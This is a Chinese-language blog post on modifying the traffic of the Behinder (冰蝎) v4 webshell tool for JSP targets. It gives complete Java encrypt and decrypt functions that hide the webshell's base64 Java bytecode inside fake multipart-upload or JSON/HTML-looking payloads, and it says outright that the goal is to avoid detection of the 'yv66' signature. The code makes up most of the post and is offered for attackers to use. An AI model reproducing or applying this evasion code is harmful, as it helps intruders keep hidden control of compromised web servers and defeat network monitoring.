0x00 前言
冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便,本文以jsp脚本类型为例,提供一些冰蝎4流量魔改的方式
0x01传输协议分析
冰蝎4内置了如下几种传输协议,传输协议可以理解为流量的加密方式
以default_xor传输协议为例,这种传输协议是对原始数据进行了异或加密
效果如下:
冰蝎4将加解密函数给外置出来,我们可以自己定义通信流量的加密方式,用变换传输方式的方法可以使通信流量更像业务,但是加密流量只进行了一次base64编码,我们知道原始流量是java字节码,在经过base64编码后会有yv66这样的魔术头,这样很容易被检测到,所以我们可以用加密方式和传输方式相结合的方法来躲避检测
通过修改加解密函数让流量看起来正常一些,让传输数据看起来就像在加载html代码一样
加密函数:
privatebyte[]Encrypt(byte[] data) throws Exception{String upload="-----------------------------7e6103b1815de Content-Disposition:form-data;name="uploadFile";filename="test.png" Content-Type:application/octet-stream DaYer0 -----------------------------7e6103b1815de--";String str ="";String result = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">");for(inti=0;i<result.length();i++){intch = (int)result.charAt(i);String s4 = Integer.toHexString(ch);s4 = s4.replace("a","<a>").replace("b","</a>").replace("c","<img>").replace("d","</img>").replace("e","<p>").replace("f","</p>").replace("1","<id>").replace("2","</id>").replace("3","<li>").replace("4","</li>").replace("5","<div>").replace("6","</div>").replace("7","<ul>").replace("8","</ul>").replace("9","<span>").replace("0","</span>");str = str + s4;}upload=upload.replace("DaYer0",str);returnupload.getBytes();}
解密函数:
privatebyte[]Decrypt(byte[] data) throws Exception{java.io.ByteArrayOutputStream bos=newjava.io.ByteArrayOutputStream();bos.write(data,150,data.length-195);//String s= new String(bos.toByteArray());byte[] writtenData = bos.toByteArray();// 获取写入的数据String writtenDataString =newString(writtenData);// 将字节数组转换为字符串System.out.println(writtenDataString);// 打印写入的数据// String s= new String(bos.toByteArray());String s = writtenDataString.replace("<a>","a").replace("</a>","b").replace("<img>","c").replace("</img>","d").replace("<p>","e").replace("</p>","f").replace("<id>","1").replace("</id>","2").replace("<li>","3").replace("</li>","4").replace("<div>","5").replace("</div>","6").replace("<ul>","7").replace("</ul>","8").replace("<span>","9").replace("</span>","0");byte[] baKeyword =newbyte[s.length()/2];for(inti =0; i < baKeyword.length; i++){try{baKeyword[i] = (byte)(0xff& Integer.parseInt(s.substring(i*2, i*2+2),16));}catch(Exception e){e.printStackTrace();}}try{s =newString(baKeyword,"utf-8");}catch(Exception e1){e1.printStackTrace();}System.out.println(s);returnjava.util.Base64.getDecoder().decode(s.replace("<","+").replace(">","/"));}
通信流量大致是下面这样:
我们也可以稍微变换一下,让他看起来像传输json一样
加密函数:
privatebyte[]Encrypt(byte[] data) throws Exception{String upload="{ "status":200, html:"XXYYZZ"}";String str ="";String result = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">");for(inti=0;i<result.length();i++){intch = (int)result.charAt(i);String s4 = Integer.toHexString(ch);s4 = s4.replace("a","<a>").replace("b","</a>").replace("c","<img>").replace("d","</img>").replace("e","<p>").replace("f","</p>").replace("1","<id>").replace("2","</id>").replace("3","<li>").replace("4","</li>").replace("5","<div>").replace("6","</div>").replace("7","<ul>").replace("8","</ul>").replace("9","<span>").replace("0","</span>");str = str + s4;}upload=upload.replace("XXYYZZ",str);returnupload.getBytes();}
解密函数:
privatebyte[]Decrypt(byte[] data) throws Exception{java.io.ByteArrayOutputStream bos=newjava.io.ByteArrayOutputStream();bos.write(data,23,data.length-25);//String s= new String(bos.toByteArray());byte[] writtenData = bos.toByteArray();// 获取写入的数据String writtenDataString =newString(writtenData);// 将字节数组转换为字符串System.out.println(writtenDataString);// 打印写入的数据// String s= new String(bos.toByteArray());String s = writtenDataString.replace("<a>","a").replace("</a>","b").replace("<img>","c").replace("</img>","d").replace("<p>","e").replace("</p>","f").replace("<id>","1").replace("</id>","2").replace("<li>","3").replace("</li>","4").replace("<div>","5").replace("</div>","6").replace("<ul>","7").replace("</ul>","8").replace("<span>","9").replace("</span>","0");byte[] baKeyword =newbyte[s.length()/2];for(inti =0; i < baKeyword.length; i++){try{baKeyword[i] = (byte)(0xff& Integer.parseInt(s.substring(i*2, i*2+2),16));}catch(Exception e){e.printStackTrace();}}try{s =newString(baKeyword,"utf-8");}catch(Exception e1){e1.printStackTrace();}System.out.println(s);returnjava.util.Base64.getDecoder().decode(s.replace("<","+").replace(">","/"));}
通信流量如下:
本文部分内容参考先知社区的一些想法:
https://xz.aliyun.com/t/12453- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论